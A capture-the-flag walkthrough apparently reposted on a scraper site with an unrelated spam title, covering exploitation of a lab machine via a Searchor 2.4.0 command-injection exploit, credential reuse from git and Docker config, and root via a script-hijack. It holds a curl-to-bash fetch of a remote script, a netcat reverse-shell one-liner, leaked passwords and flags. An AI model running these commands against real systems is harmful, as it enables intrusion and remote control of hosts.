您的位置:首页 > 健康 > 养生 > java入门基础知识_app ui界面设计模板_搜狗搜索引擎推广_网络竞价托管公司

java入门基础知识_app ui界面设计模板_搜狗搜索引擎推广_网络竞价托管公司

2025/5/19 12:35:57 来源:https://blog.csdn.net/qq_51886509/article/details/145693060  浏览:    关键词:java入门基础知识_app ui界面设计模板_搜狗搜索引擎推广_网络竞价托管公司
java入门基础知识_app ui界面设计模板_搜狗搜索引擎推广_网络竞价托管公司

Information Gathering

IP AddressOpening Ports
10.10.11.208TCP:22,80

$ ip='10.10.11.208'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Searcher
| http-server-header: 
|   Apache/2.4.52 (Ubuntu)
|_  Werkzeug/2.1.2 Python/3.10.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Flask Searchor 2.4.0 RCE

# echo "10.10.11.208 searcher.htb">>/etc/hosts

image.png

image-1.png

https://nvd.nist.gov/vuln/detail/cve-2023-43364

image-2.png

https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection

$ ./exp.sh http://searcher.htb/ 10.10.16.24 443

image-3.png

Lateral movement

$ git config --list

image-4.png

username:cody
password:jh1usoih2bkjaspwe92

image-5.png

image-6.png

User.txt

9ce7574a289aa1a8e55be7c25422f0ff

Privilege Escalation:Gitea source code leak

image-7.png

image-8.png

https://github.com/MartinxMax/KTOR/blob/main/ktor.sh

$ curl http://10.10.16.24/ktor.sh|bash -s -- -l -p all

image-9.png

$ ssh svc@10.10.11.208 -L 3000:localhost:3000

image-10.png

$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps

image-11.png

获取 gitea 容器的详细信息

$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' gitea|jq

image-12.png

username:gitea
password:yuiu1hoiu4i5ho1uh

凭据登录系统

http://127.0.0.1:3000/administrator/scripts/src/branch/main/system-checkup.py

image-13.png

$ echo -e '#!/bin/bash\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.24 445 >/tmp/f'>/tmp/full-checkup.sh;chmod +x full-checkup.sh

$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

image-14.png

Root.txt

6b43b2d81f68a5b94fdaf1c89cd27d56

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

最新新闻

热搜词

网络营销的渠道汇总 mysql 8.0 root 账户密码忘记重置方法 使用 Sales_data 类实现交易合并(三十) 第十二届蓝桥杯省赛软件类(cc++组) Docker部署sprintboot后端项目 昆明理工大学25年机电工程学院调剂名额表

声明:本站所有新闻及新闻图片来源于其他网站,如有侵权,请及时联系我们!

客户服务 | 关于我们 | 版权声明

版权所有:

Copyright 2024 尧图网 All Rights Reserved.QQ:809451989